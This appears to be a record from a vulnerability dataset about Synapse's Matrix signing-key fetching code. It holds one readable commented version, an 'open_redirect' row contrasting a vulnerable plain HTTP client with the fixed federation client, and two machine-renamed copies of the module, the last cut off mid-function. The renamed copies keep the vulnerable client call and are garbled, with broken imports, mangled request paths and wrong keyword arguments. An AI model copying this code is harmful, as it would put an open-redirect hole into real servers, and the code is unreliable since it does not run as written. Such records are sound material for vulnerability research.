        remaining_requests.difference_update(completed)
class KeyFetcher:
    """Abstract source of server signing keys.

    Concrete subclasses obtain keys from a particular backend: the local
    datastore, a trusted notary ("perspectives") server, or the origin
    server itself.
    """

    async def get_keys(self, keys_to_fetch):
        """Attempt to fetch a batch of signing keys.

        Args:
            keys_to_fetch (dict[str, dict[str, int]]):
                the keys to be fetched, as a map of
                server_name -> key_id -> minimum valid-until timestamp

        Returns:
            dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]:
                map from server_name -> key_id -> FetchKeyResult
        """
        raise NotImplementedError
class StoreKeyFetcher(KeyFetcher):
    """KeyFetcher impl which fetches keys from our data store"""

    def __init__(self, hs):
        self.store = hs.get_datastore()

    async def get_keys(self, keys_to_fetch):
        """see KeyFetcher.get_keys"""
        # Flatten the nested request map into (server_name, key_id) pairs.
        # Note that the per-key minimum-validity values are not passed on to
        # the store.
        wanted = [
            (server_name, key_id)
            for server_name, server_keys in keys_to_fetch.items()
            for key_id in server_keys
        ]

        fetched = await self.store.get_server_verify_keys(wanted)

        # Re-nest the flat result into server_name -> key_id -> key.
        results = {}
        for (server_name, key_id), key in fetched.items():
            results.setdefault(server_name, {})[key_id] = key
        return results
class BaseV2KeyFetcher:
    """Shared base for fetchers which handle the v2 'Server Keys' format.

    Provides the parsing, signature-checking and persistence logic which is
    common to fetching keys directly from origin servers and via notaries.
    """

    def __init__(self, hs):
        self.store = hs.get_datastore()
        self.config = hs.get_config()

    async def process_v2_response(self, from_server, response_json, time_added_ms):
        """Parse a 'Server Keys' structure from the result of a /key request

        This is used to parse either the entirety of the response from
        GET /_matrix/key/v2/server, or a single entry from the list returned by
        POST /_matrix/key/v2/query.

        Checks that each signature in the response that claims to come from the origin
        server is valid, and that there is at least one such signature.

        Stores the json in server_keys_json so that it can be used for future responses
        to /_matrix/key/v2/query.

        Args:
            from_server (str): the name of the server producing this result: either
                the origin server for a /_matrix/key/v2/server request, or the notary
                for a /_matrix/key/v2/query.
            response_json (dict): the json-decoded Server Keys response object
            time_added_ms (int): the timestamp to record in server_keys_json

        Returns:
            Deferred[dict[str, FetchKeyResult]]: map from key_id to result object
        """
        ts_valid_until_ms = response_json["valid_until_ts"]
        # start by extracting the keys from the response, since they may be required
        # to validate the signature on the response.
        verify_keys = {}
        for key_id, key_data in response_json["verify_keys"].items():
            # skip any keys signed with algorithms we do not support
            if is_signing_algorithm_supported(key_id):
                key_base64 = key_data["key"]
                key_bytes = decode_base64(key_base64)
                verify_key = decode_verify_key_bytes(key_id, key_bytes)
                verify_keys[key_id] = FetchKeyResult(
                    verify_key=verify_key, valid_until_ts=ts_valid_until_ms
                )

        server_name = response_json["server_name"]
        verified = False
        # the response must carry at least one valid signature from the origin
        # server, made with one of the keys included in the response itself.
        for key_id in response_json["signatures"].get(server_name, {}):
            key = verify_keys.get(key_id)
            if not key:
                # the key may not be present in verify_keys if:
                #  * we got the key from the notary server, and:
                #  * the key belongs to the notary server, and:
                #  * the notary server is using a different key to sign notary
                #    responses.
                continue
            # raises SignatureVerifyException if the signature doesn't check out
            verify_signed_json(response_json, server_name, key.verify_key)
            verified = True
            break

        if not verified:
            raise KeyLookupError(
                "Key response for %s is not signed by the origin server"
                % (server_name,)
            )

        # old keys carry their own per-key expiry time rather than sharing the
        # response-wide valid_until_ts
        for key_id, key_data in response_json["old_verify_keys"].items():
            if is_signing_algorithm_supported(key_id):
                key_base64 = key_data["key"]
                key_bytes = decode_base64(key_base64)
                verify_key = decode_verify_key_bytes(key_id, key_bytes)
                verify_keys[key_id] = FetchKeyResult(
                    verify_key=verify_key, valid_until_ts=key_data["expired_ts"]
                )

        key_json_bytes = encode_canonical_json(response_json)

        # persist the raw response for each key, so we can serve it to other
        # servers via /_matrix/key/v2/query
        await make_deferred_yieldable(
            defer.gatherResults(
                [
                    run_in_background(
                        self.store.store_server_keys_json,
                        server_name=server_name,
                        key_id=key_id,
                        from_server=from_server,
                        ts_now_ms=time_added_ms,
                        ts_expires_ms=ts_valid_until_ms,
                        key_json_bytes=key_json_bytes,
                    )
                    for key_id in verify_keys
                ],
                consumeErrors=True,
            ).addErrback(unwrapFirstError)
        )

        return verify_keys
class PerspectivesKeyFetcher(BaseV2KeyFetcher):
    """KeyFetcher impl which fetches keys from the "perspectives" servers"""

    def __init__(self, hs):
        super().__init__(hs)
        self.clock = hs.get_clock()
        self.client = hs.get_federation_http_client()
        # the configured trusted notary servers
        # (list of synapse.config.key.TrustedKeyServer)
        self.key_servers = self.config.key_servers

    async def get_keys(self, keys_to_fetch):
        """see KeyFetcher.get_keys"""

        async def get_key(key_server):
            # ask a single notary for the whole batch of keys. Failures are
            # logged and swallowed (returning an empty dict), so one broken
            # notary cannot break the entire lookup.
            try:
                result = await self.get_server_verify_key_v2_indirect(
                    keys_to_fetch, key_server
                )
                return result
            except KeyLookupError as e:
                logger.warning(
                    "Key lookup failed from %r: %s", key_server.server_name, e
                )
            except Exception as e:
                logger.exception(
                    "Unable to get key from %r: %s %s",
                    key_server.server_name,
                    type(e).__name__,
                    str(e),
                )
            return {}

        # query all the configured notaries in parallel
        results = await make_deferred_yieldable(
            defer.gatherResults(
                [run_in_background(get_key, server) for server in self.key_servers],
                consumeErrors=True,
            ).addErrback(unwrapFirstError)
        )

        # merge the per-notary results into a single map. Where two notaries
        # returned a result for the same key id, the later one wins
        # (dict.update overwrites).
        union_of_keys = {}
        for result in results:
            for server_name, keys in result.items():
                union_of_keys.setdefault(server_name, {}).update(keys)

        return union_of_keys

    async def get_server_verify_key_v2_indirect(self, keys_to_fetch, key_server):
        """Fetch keys from a single notary server via POST /_matrix/key/v2/query

        Args:
            keys_to_fetch (dict[str, dict[str, int]]):
                the keys to be fetched. server_name -> key_id -> min_valid_ts
            key_server (synapse.config.key.TrustedKeyServer): notary server to query for
                the keys

        Returns:
            dict[str, dict[str, synapse.storage.keys.FetchKeyResult]]: map
                from server_name -> key_id -> FetchKeyResult

        Raises:
            KeyLookupError if there was an error processing the entire response from
                the server
        """
        perspective_name = key_server.server_name
        logger.info(
            "Requesting keys %s from notary server %s",
            keys_to_fetch.items(),
            perspective_name,
        )
        try:
            query_response = await self.client.post_json(
                destination=perspective_name,
                path="/_matrix/key/v2/query",
                data={
                    "server_keys": {
                        server_name: {
                            key_id: {"minimum_valid_until_ts": min_valid_ts}
                            for key_id, min_valid_ts in server_keys.items()
                        }
                        for server_name, server_keys in keys_to_fetch.items()
                    }
                },
            )
        except (NotRetryingDestination, RequestSendFailed) as e:
            # these both have str() representations which we can't really improve upon
            raise KeyLookupError(str(e))
        except HttpResponseException as e:
            raise KeyLookupError("Remote server returned an error: %s" % (e,))

        keys = {}
        added_keys = []

        time_now_ms = self.clock.time_msec()

        for response in query_response["server_keys"]:
            # do this first, so that we can give useful errors thereafter
            server_name = response.get("server_name")
            if not isinstance(server_name, str):
                raise KeyLookupError(
                    "Malformed response from key notary server %s: invalid server_name"
                    % (perspective_name,)
                )
            try:
                # check the notary's own signature on the entry before trusting
                # it, then parse/verify/persist it as a normal v2 key response
                self._validate_perspectives_response(key_server, response)
                processed_response = await self.process_v2_response(
                    perspective_name, response, time_added_ms=time_now_ms
                )
            except KeyLookupError as e:
                logger.warning(
                    "Error processing response from key notary server %s for origin "
                    "server %s: %s",
                    perspective_name,
                    server_name,
                    e,
                )
                # we continue to process the rest of the response
                continue
            added_keys.extend(
                (server_name, key_id, key) for key_id, key in processed_response.items()
            )
            keys.setdefault(server_name, {}).update(processed_response)

        # persist all the newly-fetched keys to the datastore in one go
        await self.store.store_server_verify_keys(
            perspective_name, time_now_ms, added_keys
        )

        return keys

    def _validate_perspectives_response(self, key_server, response):
        """Optionally check the signature on the result of a /key/query request

        Args:
            key_server (synapse.config.key.TrustedKeyServer): the notary server that
                produced this result
            response (dict): the json-decoded Server Keys response object

        Raises:
            KeyLookupError if the response is not signed with a known notary key
        """
        perspective_name = key_server.server_name
        perspective_keys = key_server.verify_keys

        if perspective_keys is None:
            # signature checking is disabled on this server
            return

        if (
            "signatures" not in response
            or perspective_name not in response["signatures"]
        ):
            raise KeyLookupError("Response not signed by the notary server")

        verified = False
        # check every signature made with a key we know about: each one must
        # verify (verify_signed_json raises otherwise), and there must be at
        # least one such signature.
        for key_id in response["signatures"][perspective_name]:
            if key_id in perspective_keys:
                verify_signed_json(response, perspective_name, perspective_keys[key_id])
                verified = True

        if not verified:
            raise KeyLookupError(
                "Response not signed with a known key: signed with: %r, known keys: %r"
                % (
                    list(response["signatures"][perspective_name].keys()),
                    list(perspective_keys.keys()),
                )
            )
class ServerKeyFetcher(BaseV2KeyFetcher):
    """KeyFetcher impl which fetches keys from the origin servers"""

    def __init__(self, hs):
        super().__init__(hs)
        self.clock = hs.get_clock()
        self.client = hs.get_federation_http_client()

    async def get_keys(self, keys_to_fetch):
        """Fetch the requested keys by asking each origin server directly.

        Args:
            keys_to_fetch (dict[str, iterable[str]]):
                the keys to be fetched. server_name -> key_ids

        Returns:
            dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]:
                map from server_name -> key_id -> FetchKeyResult
        """
        fetched = {}

        async def _fetch_from_server(item):
            # one (server_name, key_ids) pair. Lookup failures are logged and
            # swallowed so that one unreachable server doesn't fail the batch.
            origin, wanted_key_ids = item
            try:
                fetched[origin] = await self.get_server_verify_key_v2_direct(
                    origin, wanted_key_ids
                )
            except KeyLookupError as e:
                logger.warning(
                    "Error looking up keys %s from %s: %s", wanted_key_ids, origin, e
                )
            except Exception:
                logger.exception("Error getting keys %s from %s", wanted_key_ids, origin)

        await yieldable_gather_results(_fetch_from_server, keys_to_fetch.items())
        return fetched

    async def get_server_verify_key_v2_direct(self, server_name, key_ids):
        """Fetch the given key ids via GET /_matrix/key/v2/server requests.

        Args:
            server_name (str): origin server to query
            key_ids (iterable[str]): the key IDs to look up

        Returns:
            dict[str, FetchKeyResult]: map from key ID to lookup result

        Raises:
            KeyLookupError if there was a problem making the lookup
        """
        keys = {}  # type: dict[str, FetchKeyResult]
        for requested_key_id in key_ids:
            # a single /server response can contain several keys, so an earlier
            # iteration may already have fetched this one as a side-effect.
            if requested_key_id in keys:
                continue
            keys.update(await self._fetch_single_key(server_name, requested_key_id))
        return keys

    async def _fetch_single_key(self, server_name, requested_key_id):
        """Request one key id from the origin server; verify and persist the result.

        Returns:
            dict[str, FetchKeyResult]: all keys included in the server's response

        Raises:
            KeyLookupError on any request or validation failure
        """
        time_now_ms = self.clock.time_msec()
        try:
            response = await self.client.get_json(
                destination=server_name,
                path="/_matrix/key/v2/server/"
                + urllib.parse.quote(requested_key_id),
                ignore_backoff=True,
                # we only give the remote server 10s to respond. It should be an
                # easy request to handle, so if it doesn't reply within 10s, it's
                # probably not going to.
                #
                # Furthermore, when we are acting as a notary server, we cannot
                # wait all day for all of the origin servers, as the requesting
                # server will otherwise time out before we can respond.
                #
                # (Note that get_json may make 4 attempts, so this can still take
                # almost 45 seconds to fetch the headers, plus up to another 60s to
                # read the response).
                timeout=10000,
            )
        except (NotRetryingDestination, RequestSendFailed) as e:
            # these both have str() representations which we can't really improve
            # upon
            raise KeyLookupError(str(e))
        except HttpResponseException as e:
            raise KeyLookupError("Remote server returned an error: %s" % (e,))

        if response["server_name"] != server_name:
            raise KeyLookupError(
                "Expected a response for server %r not %r"
                % (server_name, response["server_name"])
            )

        response_keys = await self.process_v2_response(
            from_server=server_name,
            response_json=response,
            time_added_ms=time_now_ms,
        )
        await self.store.store_server_verify_keys(
            server_name,
            time_now_ms,
            [(server_name, key_id, key) for key_id, key in response_keys.items()],
        )
        return response_keys
async def _handle_key_deferred(verify_request) -> None:
    """Wait until the requested key is available, then verify the signature.

    Args:
        verify_request (VerifyJsonRequest):

    Raises:
        SynapseError if there was a problem performing the verification
    """
    server = verify_request.server_name
    # block until the key lookup (started elsewhere) has completed
    with PreserveLoggingContext():
        _, _key_id, verify_key = await verify_request.key_ready

    try:
        verify_signed_json(verify_request.json_object, server, verify_key)
    except SignatureVerifyException as e:
        logger.debug(
            "Error verifying signature for %s:%s:%s with key %s: %s",
            server,
            verify_key.alg,
            verify_key.version,
            encode_verify_key_base64(verify_key),
            str(e),
        )
        message = "Invalid signature for server %s with key %s:%s: %s" % (
            server,
            verify_key.alg,
            verify_key.version,
            str(e),
        )
        raise SynapseError(401, message, Codes.UNAUTHORIZED)
| open_redirect | {
"code": [
" self.client = hs.get_http_client()",
" self.client = hs.get_http_client()"
],
"line_no": [
581,
751
]
} | {
"code": [
" self.client = hs.get_federation_http_client()",
" self.client = hs.get_federation_http_client()"
],
"line_no": [
581,
751
]
} |
import logging
import urllib
from collections import .defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import .decode_base64
from twisted.internet import .defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class CLASS_0:
VAR_2 = attr.ib()
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
VAR_6 = attr.ib(init=False)
VAR_7 = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class CLASS_1(ValueError):
pass
class CLASS_2:
def __init__(self, VAR_8, VAR_9=None):
self.clock = VAR_8.get_clock()
if VAR_9 is None:
VAR_9 = (
CLASS_4(VAR_8),
CLASS_6(VAR_8),
CLASS_7(VAR_8),
)
self._key_fetchers = VAR_9
self.key_downloads = {}
def FUNC_1(
self, VAR_2, VAR_3, VAR_10, VAR_5
):
VAR_22 = CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
VAR_23 = (VAR_22,)
return make_deferred_yieldable(self._verify_objects(VAR_23)[0])
def FUNC_2(self, VAR_11):
return self._verify_objects(
CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
for VAR_2, VAR_3, VAR_10, VAR_5 in VAR_11
)
def FUNC_3(self, VAR_12):
VAR_24 = []
VAR_25 = preserve_fn(FUNC_0)
def FUNC_13(VAR_1):
if not VAR_1.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (VAR_1.server_name,),
Codes.UNAUTHORIZED,
)
)
VAR_0.debug(
"Verifying %s for %s with VAR_6 %s, min_validity %i",
VAR_1.request_name,
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
VAR_24.append(VAR_1)
return VAR_25(VAR_1)
VAR_26 = [FUNC_13(r) for r in VAR_12]
if VAR_24:
run_in_background(self._start_key_lookups, VAR_24)
return VAR_26
async def FUNC_4(self, VAR_12):
try:
VAR_45 = {}
for VAR_1 in VAR_12:
VAR_2 = VAR_1.server_name
VAR_52 = id(VAR_1)
VAR_45.setdefault(VAR_2, set()).add(VAR_52)
await self.wait_for_previous_lookups(VAR_45.keys())
for VAR_2 in VAR_45.keys():
self.key_downloads[VAR_2] = defer.Deferred()
VAR_0.debug("Got VAR_49 lookup lock on %s", VAR_2)
def FUNC_16(VAR_2):
VAR_53 = self.key_downloads.pop(VAR_2)
VAR_53.callback(None)
def FUNC_17(VAR_30, VAR_1):
VAR_2 = VAR_1.server_name
VAR_54 = VAR_45[VAR_2]
VAR_54.remove(id(VAR_1))
if not VAR_54:
VAR_0.debug("Releasing VAR_49 lookup lock on %s", VAR_2)
FUNC_16(VAR_2)
return VAR_30
for VAR_1 in VAR_12:
VAR_1.key_ready.addBoth(FUNC_17, VAR_1)
self._get_server_verify_keys(VAR_12)
except Exception:
VAR_0.exception("Error starting VAR_49 lookups")
async def FUNC_5(self, VAR_13) -> None:
VAR_27 = 1
while True:
VAR_46 = [
(VAR_2, self.key_downloads[VAR_2])
for VAR_2 in VAR_13
if VAR_2 in self.key_downloads
]
if not VAR_46:
break
VAR_0.info(
"Waiting for existing lookups for %s to complete [loop %i]",
[w[0] for w in VAR_46],
VAR_27,
)
with PreserveLoggingContext():
await defer.DeferredList((w[1] for w in VAR_46))
VAR_27 += 1
def FUNC_6(self, VAR_12):
VAR_15 = {rq for rq in VAR_12 if not rq.key_ready.called}
async def FUNC_14():
try:
with Measure(self.clock, "get_server_verify_keys"):
for f in self._key_fetchers:
if not VAR_15:
return
await self._attempt_key_fetches_with_fetcher(
f, VAR_15
)
while VAR_15:
VAR_1 = VAR_15.pop()
VAR_60 = (
"VerifyJsonRequest(server=%s, VAR_6=%s, min_valid=%i)"
% (
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
)
self.clock.call_later(
0,
VAR_1.key_ready.errback,
SynapseError(
401,
"Failed to find any VAR_49 to satisfy %s" % (VAR_60,),
Codes.UNAUTHORIZED,
),
)
except Exception as err:
VAR_0.error("Unexpected error in FUNC_6: %s", err)
with PreserveLoggingContext():
for VAR_1 in VAR_15:
if not VAR_1.key_ready.called:
VAR_1.key_ready.errback(err)
run_in_background(FUNC_14)
async def FUNC_7(self, VAR_14, VAR_15):
VAR_28 = defaultdict(dict)
for VAR_1 in VAR_15:
assert not VAR_1.key_ready.called
VAR_47 = VAR_28[VAR_1.server_name]
for VAR_43 in VAR_1.key_ids:
VAR_47[VAR_43] = max(
VAR_47.get(VAR_43, -1),
VAR_1.minimum_valid_until_ts,
)
VAR_26 = await VAR_14.get_keys(VAR_28)
VAR_29 = []
for VAR_1 in VAR_15:
VAR_2 = VAR_1.server_name
VAR_48 = VAR_26.get(VAR_2, {})
for VAR_43 in VAR_1.key_ids:
VAR_55 = VAR_48.get(VAR_43)
if not VAR_55:
continue
if (
VAR_55.valid_until_ts
< VAR_1.minimum_valid_until_ts
):
continue
VAR_0.debug(
"Found VAR_49 %s:%s for %s",
VAR_2,
VAR_43,
VAR_1.request_name,
)
self.clock.call_later(
0,
VAR_1.key_ready.callback,
(VAR_2, VAR_43, VAR_55.verify_key),
)
VAR_29.append(VAR_1)
break
VAR_15.difference_update(VAR_29)
class CLASS_3:
async def FUNC_8(self, VAR_16):
raise NotImplementedError
class CLASS_4(CLASS_3):
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
async def FUNC_8(self, VAR_16):
VAR_16 = (
(VAR_2, VAR_43)
for VAR_2, VAR_47 in VAR_16.items()
for VAR_43 in VAR_47.keys()
)
VAR_30 = await self.store.get_server_verify_keys(VAR_16)
VAR_31 = {}
for (VAR_2, VAR_43), VAR_49 in VAR_30.items():
VAR_31.setdefault(VAR_2, {})[VAR_43] = VAR_49
return VAR_31
class CLASS_5:
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
self.config = VAR_8.get_config()
async def FUNC_9(self, VAR_17, VAR_18, VAR_19):
VAR_32 = VAR_18["valid_until_ts"]
VAR_33 = {}
for VAR_43, key_data in VAR_18["verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=VAR_32
)
VAR_2 = VAR_18["server_name"]
VAR_34 = False
for VAR_43 in VAR_18["signatures"].get(VAR_2, {}):
VAR_49 = VAR_33.get(VAR_43)
if not VAR_49:
continue
verify_signed_json(VAR_18, VAR_2, VAR_49.verify_key)
VAR_34 = True
break
if not VAR_34:
raise CLASS_1(
"Key VAR_21 for %s is not signed by the origin server"
% (VAR_2,)
)
for VAR_43, key_data in VAR_18["old_verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=key_data["expired_ts"]
)
VAR_35 = encode_canonical_json(VAR_18)
await make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.store_server_keys_json,
VAR_2=VAR_2,
VAR_43=key_id,
VAR_17=from_server,
ts_now_ms=VAR_19,
ts_expires_ms=VAR_32,
VAR_35=key_json_bytes,
)
for VAR_43 in VAR_33
],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
return VAR_33
class CLASS_6(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_http_client()
self.key_servers = self.config.key_servers
async def FUNC_8(self, VAR_16):
async def FUNC_15(VAR_20):
try:
VAR_58 = await self.get_server_verify_key_v2_indirect(
VAR_16, VAR_20
)
return VAR_58
except CLASS_1 as e:
VAR_0.warning(
"Key lookup failed from %r: %s", VAR_20.server_name, e
)
except Exception as e:
VAR_0.exception(
"Unable to get VAR_49 from %r: %s %s",
VAR_20.server_name,
type(e).__name__,
str(e),
)
return {}
VAR_26 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_15, server) for server in self.key_servers],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
VAR_36 = {}
for VAR_58 in VAR_26:
for VAR_2, VAR_31 in VAR_58.items():
VAR_36.setdefault(VAR_2, {}).update(VAR_31)
return VAR_36
async def FUNC_10(self, VAR_16, VAR_20):
VAR_37 = VAR_20.server_name
VAR_0.info(
"Requesting VAR_31 %s from notary server %s",
VAR_16.items(),
VAR_37,
)
try:
VAR_50 = await self.client.post_json(
destination=VAR_37,
path="/_matrix/VAR_49/v2/query",
data={
"server_keys": {
VAR_2: {
VAR_43: {"minimum_valid_until_ts": min_valid_ts}
for VAR_43, min_valid_ts in server_keys.items()
}
for VAR_2, server_keys in VAR_16.items()
}
},
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
VAR_31 = {}
VAR_38 = []
VAR_39 = self.clock.time_msec()
for VAR_21 in VAR_50["server_keys"]:
VAR_2 = VAR_21.get("server_name")
if not isinstance(VAR_2, str):
raise CLASS_1(
"Malformed VAR_21 from VAR_49 notary server %s: invalid server_name"
% (VAR_37,)
)
try:
self._validate_perspectives_response(VAR_20, VAR_21)
VAR_59 = await self.process_v2_response(
VAR_37, VAR_21, VAR_19=VAR_39
)
except CLASS_1 as e:
VAR_0.warning(
"Error processing VAR_21 from VAR_49 notary server %s for origin "
"server %s: %s",
VAR_37,
VAR_2,
e,
)
continue
VAR_38.extend(
(VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_59.items()
)
VAR_31.setdefault(VAR_2, {}).update(VAR_59)
await self.store.store_server_verify_keys(
VAR_37, VAR_39, VAR_38
)
return VAR_31
def FUNC_11(self, VAR_20, VAR_21):
VAR_37 = VAR_20.server_name
VAR_40 = VAR_20.verify_keys
if VAR_40 is None:
return
if (
"signatures" not in VAR_21
or VAR_37 not in VAR_21["signatures"]
):
raise CLASS_1("Response not signed by the notary server")
VAR_34 = False
for VAR_43 in VAR_21["signatures"][VAR_37]:
if VAR_43 in VAR_40:
verify_signed_json(VAR_21, VAR_37, VAR_40[VAR_43])
VAR_34 = True
if not VAR_34:
raise CLASS_1(
"Response not signed with a known VAR_49: signed with: %r, known VAR_31: %r"
% (
list(VAR_21["signatures"][VAR_37].keys()),
list(VAR_40.keys()),
)
)
class CLASS_7(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_http_client()
async def FUNC_8(self, VAR_16):
VAR_26 = {}
async def FUNC_15(VAR_41):
VAR_2, VAR_6 = VAR_41
try:
VAR_31 = await self.get_server_verify_key_v2_direct(VAR_2, VAR_6)
VAR_26[VAR_2] = VAR_31
except CLASS_1 as e:
VAR_0.warning(
"Error looking up VAR_31 %s from %s: %s", VAR_6, VAR_2, e
)
except Exception:
VAR_0.exception("Error getting VAR_31 %s from %s", VAR_6, VAR_2)
await yieldable_gather_results(FUNC_15, VAR_16.items())
return VAR_26
async def FUNC_12(self, VAR_2, VAR_6):
VAR_31 = {} # type: dict[str, FetchKeyResult]
for requested_key_id in VAR_6:
if requested_key_id in VAR_31:
continue
VAR_39 = self.clock.time_msec()
try:
VAR_21 = await self.client.get_json(
destination=VAR_2,
path="/_matrix/VAR_49/v2/server/"
+ urllib.parse.quote(requested_key_id),
ignore_backoff=True,
timeout=10000,
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
if VAR_21["server_name"] != VAR_2:
raise CLASS_1(
"Expected a VAR_21 for server %r not %r"
% (VAR_2, VAR_21["server_name"])
)
VAR_51 = await self.process_v2_response(
VAR_17=VAR_2,
VAR_18=VAR_21,
VAR_19=VAR_39,
)
await self.store.store_server_verify_keys(
VAR_2,
VAR_39,
((VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_51.items()),
)
VAR_31.update(VAR_51)
return VAR_31
async def FUNC_0(VAR_1) -> None:
VAR_2 = VAR_1.server_name
with PreserveLoggingContext():
VAR_42, VAR_43, VAR_44 = await VAR_1.key_ready
VAR_3 = VAR_1.json_object
try:
verify_signed_json(VAR_3, VAR_2, VAR_44)
except SignatureVerifyException as e:
VAR_0.debug(
"Error verifying signature for %s:%s:%s with VAR_49 %s: %s",
VAR_2,
VAR_44.alg,
VAR_44.version,
encode_verify_key_base64(VAR_44),
str(e),
)
raise SynapseError(
401,
"Invalid signature for server %s with VAR_49 %s:%s: %s"
% (VAR_2, VAR_44.alg, VAR_44.version, str(e)),
Codes.UNAUTHORIZED,
)
|
import logging
import urllib
from collections import .defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import .decode_base64
from twisted.internet import .defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class CLASS_0:
VAR_2 = attr.ib()
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
VAR_6 = attr.ib(init=False)
VAR_7 = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class CLASS_1(ValueError):
pass
class CLASS_2:
def __init__(self, VAR_8, VAR_9=None):
self.clock = VAR_8.get_clock()
if VAR_9 is None:
VAR_9 = (
CLASS_4(VAR_8),
CLASS_6(VAR_8),
CLASS_7(VAR_8),
)
self._key_fetchers = VAR_9
self.key_downloads = {}
def FUNC_1(
self, VAR_2, VAR_3, VAR_10, VAR_5
):
VAR_22 = CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
VAR_23 = (VAR_22,)
return make_deferred_yieldable(self._verify_objects(VAR_23)[0])
def FUNC_2(self, VAR_11):
return self._verify_objects(
CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
for VAR_2, VAR_3, VAR_10, VAR_5 in VAR_11
)
def FUNC_3(self, VAR_12):
VAR_24 = []
VAR_25 = preserve_fn(FUNC_0)
def FUNC_13(VAR_1):
if not VAR_1.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (VAR_1.server_name,),
Codes.UNAUTHORIZED,
)
)
VAR_0.debug(
"Verifying %s for %s with VAR_6 %s, min_validity %i",
VAR_1.request_name,
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
VAR_24.append(VAR_1)
return VAR_25(VAR_1)
VAR_26 = [FUNC_13(r) for r in VAR_12]
if VAR_24:
run_in_background(self._start_key_lookups, VAR_24)
return VAR_26
async def FUNC_4(self, VAR_12):
try:
VAR_45 = {}
for VAR_1 in VAR_12:
VAR_2 = VAR_1.server_name
VAR_52 = id(VAR_1)
VAR_45.setdefault(VAR_2, set()).add(VAR_52)
await self.wait_for_previous_lookups(VAR_45.keys())
for VAR_2 in VAR_45.keys():
self.key_downloads[VAR_2] = defer.Deferred()
VAR_0.debug("Got VAR_49 lookup lock on %s", VAR_2)
def FUNC_16(VAR_2):
VAR_53 = self.key_downloads.pop(VAR_2)
VAR_53.callback(None)
def FUNC_17(VAR_30, VAR_1):
VAR_2 = VAR_1.server_name
VAR_54 = VAR_45[VAR_2]
VAR_54.remove(id(VAR_1))
if not VAR_54:
VAR_0.debug("Releasing VAR_49 lookup lock on %s", VAR_2)
FUNC_16(VAR_2)
return VAR_30
for VAR_1 in VAR_12:
VAR_1.key_ready.addBoth(FUNC_17, VAR_1)
self._get_server_verify_keys(VAR_12)
except Exception:
VAR_0.exception("Error starting VAR_49 lookups")
async def FUNC_5(self, VAR_13) -> None:
VAR_27 = 1
while True:
VAR_46 = [
(VAR_2, self.key_downloads[VAR_2])
for VAR_2 in VAR_13
if VAR_2 in self.key_downloads
]
if not VAR_46:
break
VAR_0.info(
"Waiting for existing lookups for %s to complete [loop %i]",
[w[0] for w in VAR_46],
VAR_27,
)
with PreserveLoggingContext():
